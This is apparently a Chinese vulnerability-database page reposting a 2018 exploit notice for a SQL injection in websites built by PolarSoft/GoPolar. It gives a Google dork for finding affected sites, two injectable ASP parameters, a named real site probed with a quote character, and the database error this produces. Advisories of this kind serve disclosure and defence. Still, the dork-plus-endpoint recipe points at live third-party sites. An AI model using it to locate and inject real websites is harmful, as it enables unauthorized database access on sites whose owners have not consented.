Website Design By PolarSoft® Inc. GoPolar SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034841 漏洞类型
发布时间 2018-06-03 更新时间 2018-06-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060031
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Website Design PolarSoft® Inc. GoPolar SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 03/06/2018
# Vendor Homepages : polarsoft.com ~ gopolar.com ~ templated.co
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89

#################################################################################################

# Description : Polarsoft is a creative team of design and development professionals who apply advanced technology to solve complex communications problems.
PolarSoft team brings together decades of deep experience in human-interface design, distributed object-oriented databases, direct digital control (DDC), networking and real-time systems. 
PolarSoft is the largest independent supplier of BACnet software products worldwide.

# Google Dork : intext:''website design: PolarSoft® Inc.''

# Exploit : /news.asp?id=[SQL Injection]

# Exploit : /memdetail.asp?id=[SQL Injection]

#################################################################################################

# Example Site =>  dfi.org/news.asp?id=193%27 => [ Proof of Concept ] => archive.is/BCoTV

# SQL-DB Error => 

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id=193''.
/news.asp, line 193

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################